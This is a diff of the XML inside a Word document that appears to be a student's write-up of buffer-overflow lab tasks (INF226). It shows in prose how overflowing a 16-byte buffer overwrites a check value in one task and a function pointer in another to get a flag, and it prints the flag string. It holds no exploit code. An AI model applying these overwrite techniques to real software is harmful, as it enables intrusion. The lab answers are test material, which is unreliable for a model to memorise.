-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Task 00</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -734,8 +75,8 @@
           <w:bCs/>
           <w:color w:val="1E4E79"/>
           <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -746,11 +87,37 @@
           <w:bCs/>
           <w:color w:val="1E4E79"/>
           <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Task 00</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Observations: Source </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ode</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -770,6 +137,270 @@
         </w:rPr>
         <w:t> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> has a 16-byte capacity. The structure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>locals</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contains this buffer, as well as a fixed-size </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">int32_t </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>check</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which is initialized to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0xabcdc3cf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The if/else-statement surrenders the flag if the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>check</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> member of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>locals</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contains the address </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0x00c0ffee</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, else prints a string and exits the program. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hence, if I </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">overflow the buffer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>send</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 16 bytes of junk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>and return to the memory address</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0xc0ffee</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, I retrieve the flag.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1859,7 +1490,6 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F49B703" wp14:editId="62F9A1EC">
             <wp:extent cx="5972810" cy="1187450"/>
@@ -1959,29 +1589,12 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>INF226{</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>s33kret c0de</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>}</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>INF226{s33kret c0de}</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2009,16 +1622,6 @@
         </w:rPr>
         <w:t> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2086,38 +1689,9 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">The buffer overflow vulnerability in this program lies in the fgets call, which reads the input to the program. There is no restriction on the size of input to the buffer, which means that an attacker can exploit it by inputing more than 16 bytes and thus overwrite the stack. </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2179,6 +1753,7 @@
           <w:kern w:val="36"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -2191,6 +1766,7 @@
           <w:kern w:val="36"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>Task 01</w:t>
@@ -2199,12 +1775,165 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Observations: Source </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In this program, the function </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is responsible for surrendering the flag. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function, the structure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>vars</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contains a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of 16-byte capacity, as well as a function pointer which is initialized not to point to any function. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
@@ -2213,6 +1942,277 @@
         </w:rPr>
         <w:t> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The if/else-statement checks </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">which address </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>funPointer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is pointing to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, and executes the function in that location - i.e. if it points to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the function is called and the flag is retrieved. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Else, it prompts user to try again.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I use a similar approach </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to 00, and overflow the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with 16 bytes of junk. This time </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>return to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
